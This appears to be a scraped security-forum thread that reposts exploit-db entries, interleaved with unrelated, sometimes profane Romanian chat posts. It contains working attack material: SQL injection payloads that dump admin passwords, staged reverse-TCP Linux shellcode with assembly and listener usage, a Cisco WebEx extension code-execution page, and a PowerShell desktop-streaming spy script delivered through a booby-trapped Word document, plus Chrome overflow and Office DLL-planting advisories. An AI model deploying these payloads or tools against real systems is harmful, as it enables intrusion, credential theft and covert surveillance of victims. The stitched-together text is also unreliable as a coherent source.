# # # # # # Exploit Title: Youtube Analytics Multi Channel v3.0 - SQL Injection # Google Dork: N/A # Date: 10.02.2017 # Vendor Homepage: http://vtcreators.com/ # Software Buy: https://codecanyon.net/item/youtube-analytics-multi-channel/14720919 # Demo: http://demo.vtcreators.com/yamc/ # Version: 3.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # Authenticated SQL injection: log in as a regular (non-admin) user, then inject into the `id` parameter of the user-management update route: # http://localhost/[PATH]/index.php/user_management/update?id=[SQL] # The advisory indicates further injection points exist ("Etc...") but gives no details for them. # # # # # Sursa: https://www.exploit-db.com/exploits/41293/.
-
########### Reverse TCP Staged Alphanumeric Shellcode Linux x86 Execve /bin/sh ######## ########### Author: Snir Levi, Applitects ############# ## 103 Bytes ## date: 9.2.17 Automatic python shellcode handler (with stage preset send) will be ready soon: https://github.com/snir-levi/Reverse_TCP_Alphanumeric_Staged_Shellcode_Execve-bin-bash/ IP - 127.0.0.1 PORT - 4444 #### Stage Alphanumeric shellcode: ##### Stage 1: dup2 stdin syscall: WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP W push edi X pop eax W push edi [ pop ebx j? push 0x3f X pop eax V push esi [ pop ebx W push edi Y pop ecx P push eax X pop eax P push eax X pop EAX Stage 2: dup2 stdout syscall: WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX W push edi X pop eax W push edi [ pop ebx j? push 0x3f X pop eax V push esi [ pop ebx W push edi Y pop ecx A inc ecx (ecx =1) P push eax X pop eax P push eax Stage 3: dup2 stderr syscall: WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP W push edi X pop eax W push edi [ pop ebx j? 
push 0x3f X pop eax V push esi [ pop ebx W push edi Y pop ecx A*2 inc ecx (ecx = 2) P push eax X pop eax A inc ecx Stage 3: execve /bin/sh: j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[ j0 push 0x30 X pop eax H*32 dec eax //eax = 0x0b W push edi Y pop ecx W push edi Z pop edx W push edi // null terminator h//sh push 0x68732f2f //sh h/bin push 0x6e69622f /bin T push esp [ pop ebx Usage: Victim Executes the shellcode, and opens tcp connection Stage: After Connection is established, send the 4 stages ***separately*** nc -lvp 4444 connect to [127.0.0.1] from localhost [127.0.0.1] (port) WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[ whoami root id uid=0(root) gid=0(root) groups=0(root) global _start _start: ; sock = socket(AF_INET, SOCK_STREAM, 0) ; AF_INET = 2 ; SOCK_STREAM = 1 ; syscall number 102 - socketcall ; socket = 0x01 xor eax,eax xor esi,esi push eax pop edi push eax mov al, 0x66 push byte 0x1 pop ebx push byte ebx push byte 0x2 mov ecx, esp int 0x80 xchg esi, eax; save sock result ; server.sin_family = AF_INET ; server.sin_port = htons(PORT) ; server.sin_addr.s_addr = inet_addr("127.0.0.1") push byte 0x1 pop edx shl edx, 24 mov dl, 0x7f ;edx = 127.0.0.1 (hex) push edx push word 0x5c11 ;port 4444 push word 0x02 ; connect(sock, (struct sockaddr *)&server, sockaddr_len) mov al, 0x66 mov bl, 0x3 mov ecx, esp push byte 0x10 push ecx push esi mov ecx ,esp int 0x80 stageAddress: ;saves stage address to edx mov edx, [esp] sub bl,3 jnz stage call near stageAddress ;recv(int sockfd, void *buf, size_t len, int flags); stage: mov al, 0x66 mov bl, 10 push edi push word 100 ; buffer size push edi push esi ; socketfd mov [esp+4],esp ; sets esp as recv buffer mov ecx,esp int 0x80 mov al, 0xcd mov ah, 0x80 ; eax = 
int 0x80 mov bl, 0xFF mov bh, 0xE2 ; ebx = jmp edx mov [esp+57],al mov [esp+58],ah mov [esp+59], ebx ;the end of the buffer contains the syscall command int 0x80 and jmp back to stage jmp esp unsigned char[] = "\x31\xc0\x31\xf6\x50\x5f\x50\xb0\x66\x6a\x01\x5b\x53\x6a \x02\x89\xe1\xcd\x80\x96\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52 \x66\x68\x11\x5c\x66\x6a\x02\xb0\x66\xb3\x03\x89\xe1\x6a\x10\x51\x56\x89\xe1 \xcd\x80\x8b\x14\x24\x80\xeb\x03\x75\x05\xe8\xf3\xff\xff\xff \xb0\x66\xb3\x0a\x57\x66\x6a\x64\x57\x56\x89\x64\x24\x04\x89\xe1\xcd\x80\xb0 \xcd\xb4\x80\xb3\xff\xb7\xe2\x88\x44\x24\x39\x88\x64\x24\x3a \x89\x5c\x24\x3b\xff\xe4" Sursa: https://www.exploit-db.com/exploits/41282/.
-
-
<!-- Cisco's WebEx extension (jlhmfgmfgeifomenelglieieghnjghma) has ~20M active users, and is part of Cisco's popular web conferencing software. The extension works on any URL that contains the magic pattern "cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html", which can be extracted from the extension's manifest. The gate is the page path (plus an https scheme), not the page's origin, so any site can serve a page under that name. Note that the pattern can occur in an iframe, so there is not necessarily any user-visible indication of what is happening; visiting any website would be enough. The extension uses nativeMessaging, so this magic string is enough for any website to execute arbitrary code (!!). The protocol the extension uses is complicated, using CustomEvent() objects to pass JSON messages between the webpage, the extension and the native code. Stepping through an initialization, a website must first request that the extension open a port for communication, like this: document.dispatchEvent(new CustomEvent("connect", { detail: { token: "token" }})); // token can be any string Then messages can be passed to native code via "message" events. Note that these cannot be MessageEvent() objects, and you cannot use the postMessage API; they have to be CustomEvent() objects. There are a few different message types, such as "hello", "disconnect", etc. 
The most interesting is "launch_meeting": document.dispatchEvent(new CustomEvent("message", { detail: { message: JSON.stringify(msg), message_type: "launch_meeting", timestamp: (new Date()).toUTCString(), token: "token" } })); I stepped through a meeting and dumped the initialization messages: > message.message "{"DocshowVersion": "1.0", "FilterSecParameters": "clientparam;clientparam_value", "GpcProductRoot": "WebEx", "GpcMovingInSubdir": "Wanta", "GpcProductVersion": "T30_MC", "GpcUpgradeManagement": "false", "GpcCompatibleDesktopClients": "", "enableQuickLaunch": "1", "GpcProductDescription": "V2ViRXg=", "GpcUnpackName": "atgpcdec", "JMTSignificantFileList": "atgpcext.dll;atmccli.dll;comui.dll;webexmgr.dll;plugin-config.xml;atmgr.exe;ieatgpc.dll;atkbctl.dll;atwbxui15.dll;atcarmcl.dll;attp.dll;atarm.dll;wbxcrypt.dll;mmssl32.dll;libeay32.dll;ssleay32.dll;atmemmgr.dll;wcldll.dll;uilibres.dll;pfwres.dll;wbxtrace.dll;mcres.dll;atresec.dll;atrestc.dll;mfs.dll;mutilpd.dll;wseclient.dll;mticket.dll;wsertp.dll", "jmtclicklog": "1484862376664", "GpcExtName": "atgpcext", "GpcUnpackVersion": "27, 17, 2016, 501", "GpcExtVersion": "3015, 0, 2016, 1117", "GpcUrlRoot": "https://join-test.webex.com/client/WBXclient-T30L10NSP15EP1-10007/webex/self", "GpcComponentName": "YXRtY2NsaS5ETEw=", "GpcCompressMethod": "7z", "GpcActiveIniSection": "V2ViRXhfVg==", "GpcSupportPageUrl": "", "GpcIniFileName": "Z3BjLnBocD9wbW9kdWxlcz0lN0NNQ19TVEQlN0NDaGF0JTdDUG9sbGluZyU3Q05vdGUlN0NWaWRlb1NoYXJlJTdDV2ViZXhfUkElN0NBUyU3Q1BEJk9TPVZUJnJlcGxhY2VLZXk9VklTVEElN0NTU0YmTE49JmJhc2ljbmFtZT1XZWJFeF9WJk9TX0JpdD0zMg== ... 
There are a huge number of properties, many are obviously good candidates for code execution, but these jumped out at me: "GpcComponentName": "YXRtY2NsaS5ETEw=", "GpcInitCall": "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", If we decode those strings, we get: GpcComponentName: "atmccli.DLL" GpcInitCall: "szCookie=InitControl(%HWND);NameValue(LoggingURL_Name,LoggingURL);NameValue(MeetingID_Name,MeetingID);NameValue(SessionID_Name,SessionID);NameValue(GpcIniFileName_Name,GpcIniFileName);NameValue(GpcUrlRoot_Name,GpcUrlRoot);NameValue(GpcExtVersion_Name,GpcExtVersion);NameValue(GpcUnpackVersion_Name,GpcUnpackVersion);NameValue(GpcProductRoot_Name,GpcProductRoot);NameValue(localrootsectionver_Name,localrootsectionver);NameValue(RegType_Name,RegType);NameValue(GpcProgressBarTitle_Name,GpcProgressBarTitle);NameValue(GpcMessageTitle_Name,GpcMessageTitle);NameValue(downloadlocalsetting_Name,downloadlocalsetting);NameValue(productname_Name,productname);NameValue(SFSupporting_Name,SFSupporting_Value);NameValue(MeetingRandom_Name,MeetingRandom);NameValue(clientparam_Name,clientparam_Value);FinishCall(szCookie);" That looks like some sort of weird scripting language. The presence of `HWND` suggests this is interacting with native code, and if I dump the exports of atmccli.DLL: $ dumpbin /nologo /exports atmccli.dll Dump of file atmccli.dll ordinal hint RVA name 2 2 0001CC11 ExitControl 24 3 0001CC83 FinishCall 1 4 0001D2F9 InitControl <-- 23 5 0001D556 NameValue ... These exports look like the functions being called in that scripting language. Is it possible it's calling those exports? 
I noticed that they ship a copy of the CRT (Microsoft's C Runtime, containing standard routines like printf, malloc, etc), so I tried calling the standard _wsystem() routime (like system(), but for WCHAR strings), like this: var msg = { GpcProductRoot: "WebEx", GpcMovingInSubdir: "Wanta", GpcProductVersion: "T30_MC", GpcUnpackName: "atgpcdec", GpcExtName: "atgpcext", GpcUnpackVersion: "27, 17, 2016, 501", GpcExtVersion: "3015, 0, 2016, 1117", GpcUrlRoot: "http://127.0.0.1/", GpcComponentName: btoa("MSVCR100.DLL"), GpcSuppressInstallation: btoa("True"), GpcFullPage: "True", GpcInitCall: btoa("_wsystem(ExploitShellCommand);"), ExploitShellCommand: btoa("calc.exe"), } Unbelievably, that worked. Example exploit attached. I uploaded a demo here for testing (this URL is secret) https://lock.cmpxchg8b.com/ieXohz9t/ (You can make sure WebEx is installed and working first by going here. You don't need to register, just enter any name and email) https://www.webex.com/test-meeting.html --> <html> <head> <title>Cisco WebEx Exploit</title> <script> var msg = { GpcProductRoot: "WebEx", GpcMovingInSubdir: "Wanta", GpcProductVersion: "T30_MC", GpcUnpackName: "atgpcdec", GpcExtName: "atgpcext", GpcUnpackVersion: "27, 17, 2016, 501", GpcExtVersion: "3015, 0, 2016, 1117", GpcUrlRoot: "http://127.0.0.1/", GpcComponentName: btoa("MSVCR100.DLL"), GpcSuppressInstallation: btoa("True"), GpcFullPage: "True", GpcInitCall: btoa("_wsystem(ExploitShellCommand);"), ExploitShellCommand: btoa("calc.exe"), } function runcode() { if (!document.location.pathname.endsWith("cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html")) { alert("document /must/ be named cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html"); return; } if (!document.location.protocol.endsWith("https:")) { alert("document /must/ be served over https"); return; } document.dispatchEvent(new CustomEvent("connect", { detail: { token: "token" }})); document.dispatchEvent(new CustomEvent("message", { detail: { 
message: JSON.stringify(msg), message_type: "launch_meeting", timestamp: (new Date()).toUTCString(), token: "token" } })); } </script> </head> <body onload="runcode()"> <h1>Running exploit...</h1> </body> </html> Sursa: https://www.exploit-db.com/exploits/41148/.
-
-
# # # # # # Exploit Title: MySQL Blob Uploader - File Upload to Database PHP Script v1.0 - SQL Injection # Google Dork: N/A # Date: 07.02.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Buy: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300 # Demo: http://demos.nelliwinne.net/MySqlFileUpload/ # Version: 1.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # The `id` parameter of download.php is injectable for both t=files and t=images_title. The union-based payloads below (6 columns for t=files, 7 for t=images_title) read the `un` and `pw` columns of the `admin` table back in the response, separated by <br> tags: # http://localhost/[PATH]/download.php?id=[SQL]&t=files # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files # http://localhost/[PATH]/download.php?id=[SQL]&t=images_title # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+from+admin-- -&t=images_title # The advisory states that other files in the script are vulnerable as well, but gives no details for them. # # # # # Sursa: https://www.exploit-db.com/exploits/41267/.
-
-
Coaie, invata sa dai si tu "Remove format" data viitoare cand mai copiezi ceva. Tie iti place cum arata? Iti place o pula.
-
La fel imi face si mie. Era la fel si inainte sa se schimbe serverul, cred ca e de la noi.
-
Veche, dar am dat iar peste ea: Why programmers like UNIX: unzip, strip, touch, finger, grep, mount, fsck, more, yes, fsck, fsck, fsck, umount, sleep.
-
Ce pula? Ai gasit un topic cu... conturi pentru filme porno si iti tre' parola sa ai acces si tu la ele?
-
Nu gasesti. Ar trebui sa fie random, cica, dar mie mi-au dat un CD Key care nici nu arata ca celelalte. Logic ca n-a mers, so... nu incercati.
-
Bine ai venit. In sfarsit mai vad si eu Bistriteni activi pe-aici.
-
https://www.exploit-db.com/docs/40143.pdf
-
https://www.exploit-db.com/exploits/38513/.
-
Recently, I have been working on an interesting concept. I wanted to use MJPEG to stream images in real time from a target desktop to be able to see the activity of a target user. I literally spent weeks getting it working, but in the end it turned out that a small piece of PowerShell code could be used to achieve this. Anyway, I give you Show-TargetScreen.ps1. This script can stream a target's desktop in real time and the stream can be viewed in browsers which support MJPEG (Firefox). Show-TargetScreen is available in the Gather category of Nishang. The current source code looks like this: function Show-TargetScreen { <# .SYNOPSIS Nishang script which can be used for streaming a target's desktop using MJPEG. .DESCRIPTION This script uses MJPEG to stream a target's desktop in real time. When using the -Reverse switch it connects back to a standard netcat listening on a port. When using -Bind it listens on the given port and a standard netcat can connect to it. A netcat listener which relays the connection to a local port can be used as the listener; a browser which supports MJPEG (Firefox) should then be pointed to the local port to see the remote desktop. The script should be used with Client Side Attacks. NOTE: the stream is sent as plain HTTP over a raw TCP socket with no authentication or encryption. In -Bind mode any host that can reach the port can view the desktop, and in -Reverse mode anyone on the network path can read the frames, so tunnel the connection (e.g. over TLS or SSH) on real engagements. .PARAMETER IPAddress The IP address to connect to when using the -Reverse switch. .PARAMETER Port The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens. .EXAMPLE PS > Show-TargetScreen -Reverse -IPAddress 192.168.230.1 -Port 443 Above shows an example of a reverse connection. A netcat/powercat listener must be listening on the given IP and port. .EXAMPLE PS > Out-Word -PayloadURL "http://192.168.1.6/Show-TargetScreen.ps1" -Arguments "Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443" Above shows an example using the script in a client side attack. .EXAMPLE PS > Show-TargetScreen -Bind -Port 1234 Above shows an example of bind mode. 
Point Firefox to the IPAddress of the target and given port to see user's Desktop. .LINK http://www.labofapenetrationtester.com/2015/12/stream-targets-desktop-using-mjpeg-and-powershell.html https://github.com/samratashok/nishang #> [CmdletBinding(DefaultParameterSetName="reverse")] Param( [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")] [String] $IPAddress, [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")] [Int] $Port, [Parameter(ParameterSetName="reverse")] [Switch] $Reverse, [Parameter(ParameterSetName="bind")] [Switch] $Bind ) while ($true) { try { Add-Type -AssemblyName System.Windows.Forms [System.IO.MemoryStream] $MemoryStream = New-Object System.IO.MemoryStream #Connect back if the reverse switch is used. if ($Reverse) { $socket = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp) $socket.Connect($IPAddress,$Port) Write-Verbose "Connected to $IPAddress" } #Bind to the provided port if Bind switch is used. 
if ($Bind) { #Start a listener $endpoint = new-object System.Net.IPEndPoint ([system.net.ipaddress]::any, $Port) $server = new-object System.Net.Sockets.TcpListener $endpoint $server.Start() $buffer = New-Object byte[] 1024 $socket = $server.AcceptSocket() } #https://evilevelive.wordpress.com/2009/03/09/web-server-written-in-powershell/ function SendResponse($sock, $string) { if ($sock.Connected) { $bytesSent = $sock.Send( $string) if ( $bytesSent -eq -1 ) { Write-Output "Send failed to " + $sock.RemoteEndPoint } } } function SendStrResponse($sock, $string) { if ($sock.Connected) { $bytesSent = $sock.Send( [text.Encoding]::Ascii.GetBytes($string)) if ( $bytesSent -eq -1 ) { Write-Output ("Send failed to " + $sock.RemoteEndPoint) } } } #Create the header for MJPEG stream function SendHeader( [net.sockets.socket] $sock, $length, $statusCode = "200 OK", $mimeHeader="text/html", $httpVersion="HTTP/1.1" ) { $response = "HTTP/1.1 $statusCode`r`n" + "Content-Type: multipart/x-mixed-replace; boundary=--boundary`r`n`n" SendStrResponse $sock $response Write-Verbose "Header sent to $IPAddress" } #Send the header SendHeader $socket while ($True) { $b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height) $g = [System.Drawing.Graphics]::FromImage($ $g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size) $g.Dispose() $MemoryStream.SetLength(0) $b.Save($MemoryStream, ([system.drawing.imaging.imageformat]::jpeg)) $b.Dispose() $length = $MemoryStream.Length [byte[]] $Bytes = $MemoryStream.ToArray() #Set the boundary for the multi-part request $str = "`n`n--boundary`n" + "Content-Type: image/jpeg`n" + "Content-Length: $length`n`n" #Send Requests SendStrResponse $socket $str SendResponse $socket $Bytes } $MemoryStream.Close() } catch { Write-Warning "Something went wrong! 
Check if the server is reachable and you are using the correct port." Write-Error $_ } } } Now, to use it for reverse connect, to avoid having to write a listener/server, I used powercat to run a local relay to which Show-TargetScreen connects and we point Firefox to the local port. So, start a powercat listener and relay to any local port. In the below command, Show-TargetScreen will connect to port 443 and Firefox will connect to Port 9000: PS C:\nishang> powercat -l -v -p 443 -r tcp:9000 -rep -t 1000 Note that if on a *nix machine, netcat could be used as well. Now, to be able to stream a user's Desktop, Show-TargetScreen must be used with a client side attack. Let's use it with Out-Word from Nishang. Since like other Nishang scripts, Show-TargetScreen.ps1 loads a function with same name, we should pass an argument -"Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443", and use it as a payload for Out-Word. PS C:\nishang> Out-Word -PayloadURL "http://192.168.1.6/Show-TargetScreen.ps1" -Arguments "Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443" Now, the generated doc file is to be sent to a target. As soon as a target user opens up the Word file, we will have a connect back on the powercat listener which will relay to the configured local port (TCP 9000 in this example). Now if we point Firefox to http://127.0.0.1:9000, we have a live stream of the target user's Desktop. Awesome! Isn't it? I recently tried this in couple of pen tests and was quite satisfied with the results. Sursa: Lab of a Penetration Tester: Stream a target's Desktop using MJPEG and PowerShell.
-
Ai placa video integrata. Nu indeplinesti cerintele minime sa rulezi jocul ala. Probabil ca-ti tre' pixel shade 3.0 si tu ai de exemplu doar 2.0.
-
Source: https://code.google.com/p/google-security-research/issues/detail?id=664 There is an overflow in the ui::PlatformCursor WebCursor::GetPlatformCursor method. In src/content/common/cursors/webcursor_aurax11.cc, there is the following code: bitmap.allocN32Pixels(custom_size_.width(), custom_size_.height()); memcpy(bitmap.getAddr32(0, 0), custom_data_.data(), custom_data_.size()); The bitmap buffer is allocated based on the width and height of custom_size_, but the memcpy is performed using the size of custom_data_. These values are set during WebCursor deserialization in src/content/common/cursors/webcursor.cc in WebCursor::Deserialize. custom_size_ is set from two integers that are deserialized from a message and can be between 0 and 1024. custom_data_ is set from a vector that is deserialized, and can be any size, unrelated to the width and height. custom_data_ is verified not to be smaller than the expected pixel buffer based on the width and height, but it can be longer. GetPlatformCursor is called indirectly by RenderWidgetHostImpl::OnSetCursor, which is called in response to a ViewHostMsg_SetCursor message from the renderer; the sizes and data are therefore attacker-controlled from a compromised renderer, while the allocation is at most 1024 * 1024 * 4 bytes and the copy length is unbounded. The issue above is in the x11 implementation, but it appears to also affect the other platform-specific implementations other than the Windows one, which instead reads out of bounds. I recommend this issue be fixed by changing the check in WebCursor::Deserialize: if (size_x * size_y * 4 > data_len) return false; to if (size_x * size_y * 4 != data_len) return false; to prevent the issue in all platform-specific implementations. 
To reproduce the issue replace WebCursor::Serialize with: bool WebCursor::Serialize(base::Pickle* pickle) const { if(type_ == WebCursorInfo::TypeCustom){ LOG(WARNING) << "IN SERIALIZE\n"; if (!pickle->WriteInt(type_) || !pickle->WriteInt(hotspot_.)) || !pickle->WriteInt(hotspot_.y()) || !pickle->WriteInt(2) || !pickle->WriteInt(1) || !pickle->WriteFloat(custom_scale_)) return false; }else{ if (!pickle->WriteInt(type_) || !pickle->WriteInt(hotspot_.)) || !pickle->WriteInt(hotspot_.y()) || !pickle->WriteInt(custom_size_.width()) || !pickle->WriteInt(custom_size_.height()) || !pickle->WriteFloat(custom_scale_)) return false; } const char* data = NULL; if (!custom_data_.empty()) data = &custom_data_[0]; if (!pickle->WriteData(data, custom_data_.size())) return false; return SerializePlatformData(pickle); } and visit the attached html page, with the attached image in the same directory. Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39039.zip Sursa: https://www.exploit-db.com/exploits/39039/.
-
Source: https://code.google.com/p/google-security-research/issues/detail?id=556 It is possible for an attacker to execute a DLL planting attack in Microsoft Office 2010 on Windows 7 x86 with a specially crafted OLE object. This attack also works on Office 2013 running on Windows 7 x64. Other platforms were not tested. The attached POC document "planted-mqrt.doc" contains what was originally an embedded Packager object. The CLSID for this object was changed at offset 0x2650 to be {ecabafc9-7f19-11d2-978e-0000f8757e2a} (formatted as pack(">IHHBBBBBBBB")). This object has an InProcServer32 pointing to comsvcs.dll, specifically the CQueueAdmin object implemented in that DLL. When a user opens this document and single-clicks on the icon for foo.txt, ole32!OleLoad is invoked on our vulnerable CLSID. This results in a call to a class factory constructor that eventually tries to call mqrt!MQGetPrivateComputerInformation. Because mqrt is a delay-loaded DLL, the loader has inserted a stub that calls _tailMerge_mqrt_dll on the first call of this function. This results in a kernelbase!LoadLibraryExA call vulnerable to DLL planting: the library is resolved through the normal search order, which includes Word's current working directory, i.e. the directory the document was opened from. If the attached mqrt.dll is placed in the same directory as the planted-mqrt.doc file you should see a popup coming from this DLL being loaded from the current working directory of Word. It's worth noting that there are several other delay-loaded DLLs reachable from comsvcs.dll as well. 
The full list is: ADVAPI32.dll API_MS_WIN_Service_Management_L1_1_0.dll API_MS_WIN_Service_Management_L2_1_0.dll API_MS_WIN_Service_winsvc_L1_1_0.dll API_MS_Win_Security_SDDL_L1_1_0.dll CLBCatQ.DLL CRYPTSP.dll MTXCLU.DLL ODBC32.dll VERSION.dll XOLEHLP.dll colbact.DLL dbghelp.dll mqrt.dll netutils.dll samcli.dll Here is the call stack from the delay loaded mqrt.dll: 0:000> kb ChildEBP RetAddr Args to Child 001b7cb4 76f15d1c 76f30924 00000460 ffffffff ntdll!KiFastSystemCallRet 001b7cb8 76f30924 00000460 ffffffff 001b7da0 ntdll!ZwMapViewOfSection+0xc 001b7d0c 76f3099a 00000460 00000000 00000000 ntdll!LdrpMapViewOfSection+0xc7 001b7da4 76f2fec4 001b7df0 001b7f00 00000000 ntdll!LdrpFindOrMapDll+0x310 001b7f24 76f325ea 001b7f84 001b7f50 00000000 ntdll!LdrpLoadDll+0x2b6 001b7f58 75188c19 003a8aac 001b7f9c 001b7f84 ntdll!LdrLoadDll+0x92 001b7f94 751890ac 00000000 00000000 003a8aac KERNELBASE!LoadLibraryExW+0x1d9 001b7fb4 70dd96c0 70e8de20 00000000 00000000 KERNELBASE!LoadLibraryExA+0x26 001b8000 70e7cb2b 00000000 70e94148 003768a0 comsvcs!__delayLoadHelper2+0x59 001b8054 70e7588e 70ea52ec 5160c47e 8007000e comsvcs!_tailMerge_mqrt_dll+0xd 001b8088 70e75c09 069d8cf8 70dd31ac 5160c442 comsvcs!CMSMQRT::Load+0x3a 001b8090 70dd31ac 5160c442 00000000 001b8114 comsvcs!CQueueAdmin::FinalConstruct+0xa 001b80b4 70dd47ef 00000000 001b9880 069d8cf8 comsvcs!ATL::CComCreator<ATL::CComObject<CQueueAdmin> >::CreateInstance+0x50 001b80c8 70dc7d08 00000000 001b9880 001b8114 comsvcs!ATL::CComCreator2<ATL::CComCreator<ATL::CComObject<CQueueAdmin> >,ATL::CComFailCreator<-2147221232> >::CreateInstance+0x18 001b80e0 765e8c86 06988358 00000000 001b9880 comsvcs!ATL::CComClassFactory::CreateInstance+0x3b 001b8168 76603170 76706444 00000000 001b94e4 ole32!CServerContextActivator::CreateInstance+0x172 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1000] 001b81a8 765e8daa 001b94e4 00000000 00414230 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 
1917] 001b81fc 767602f1 7670646c 00000000 001b94e4 ole32!CApartmentActivator::CreateInstance+0x112 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 2268] 001b8220 767c6311 765e8d36 001b8410 00000004 RPCRT4!Invoke+0x2a 001b8628 766fd7e6 06a70490 0678a6e8 067982b8 RPCRT4!NdrStubCall2+0x2d6 001b8670 766fd876 06a70490 067982b8 0678a6e8 ole32!CStdStubBuffer_Invoke+0xb6 [d:\w7rtm\com\rpc\ndrole\stub.cxx @ 1590] 001b86b8 766fddd0 067982b8 003a877c 00000000 ole32!SyncStubInvoke+0x3c [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1187] 001b8704 76618a43 067982b8 06979020 06a70490 ole32!StubInvoke+0xb9 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1396] 001b87e0 76618938 0678a6e8 00000000 06a70490 ole32!CCtxComChnl::ContextInvoke+0xfa [d:\w7rtm\com\ole32\com\dcomrem\ctxchnl.cxx @ 1262] 001b87fc 766fa44c 067982b8 00000001 06a70490 ole32!MTAInvoke+0x1a [d:\w7rtm\com\ole32\com\dcomrem\callctrl.cxx @ 2105] 001b882c 766fdb41 d0908070 0678a6e8 06a70490 ole32!AppInvoke+0xab [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1086] 001b890c 766fe1fd 06798260 003d6098 00000000 ole32!ComInvokeWithLockAndIPID+0x372 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1724] 001b8934 76619367 06798260 00000000 06798260 ole32!ComInvoke+0xc5 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1469] 001b8948 766fe356 06798260 06798260 0039d408 ole32!ThreadDispatch+0x23 [d:\w7rtm\com\ole32\com\dcomrem\chancont.cxx @ 298] 001b895c 766fe318 06798260 001b8a64 00000000 ole32!DispatchCall+0x27 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4273] 001b8988 766fcef0 001b8a50 001b8b78 0697fd00 ole32!CRpcChannelBuffer::SwitchAptAndDispatchCall+0xa1 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4321] 001b8a68 765f9d01 0697fd00 001b8b78 001b8b60 ole32!CRpcChannelBuffer::SendReceive2+0xef [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4076] 001b8ae4 765f9b24 0697fd00 001b8b78 001b8b60 ole32!CAptRpcChnl::SendReceive+0xaf [d:\w7rtm\com\ole32\com\dcomrem\callctrl.cxx @ 603] 001b8b38 766fce06 0697fd00 001b8b78 001b8b60 
ole32!CCtxComChnl::SendReceive+0x1c5 [d:\w7rtm\com\ole32\com\dcomrem\ctxchnl.cxx @ 734] 001b8b54 7675476e 06a39d34 001b8ba4 767c6753 ole32!NdrExtpProxySendReceive+0x49 [d:\w7rtm\com\rpc\ndrole\proxy.cxx @ 1932] 001b8b60 767c6753 7a61ad54 001b8fb0 0700022b RPCRT4!NdrpProxySendReceive+0xe 001b8f78 766fc8e2 7660fa10 7661484a 001b8fb0 RPCRT4!NdrClientCall2+0x1a6 001b8f98 765f98ad 00000014 00000004 001b8fc8 ole32!ObjectStublessClient+0xa2 [d:\w7rtm\com\rpc\ndrole\i386\stblsclt.cxx @ 474] 001b8fa8 765e8d1f 06a39d34 00000000 001b94e4 ole32!ObjectStubless+0xf [d:\w7rtm\com\rpc\ndrole\i386\stubless.asm @ 154] 001b8fc8 765e8aa2 76706494 00000001 00000000 ole32!CProcessActivator::CCICallback+0x6d [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1737] 001b8fe8 765e8a53 76706494 001b9340 00000000 ole32!CProcessActivator::AttemptActivation+0x2c [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1630] 001b9024 765e8e0d 76706494 001b9340 00000000 ole32!CProcessActivator::ActivateByContext+0x4f 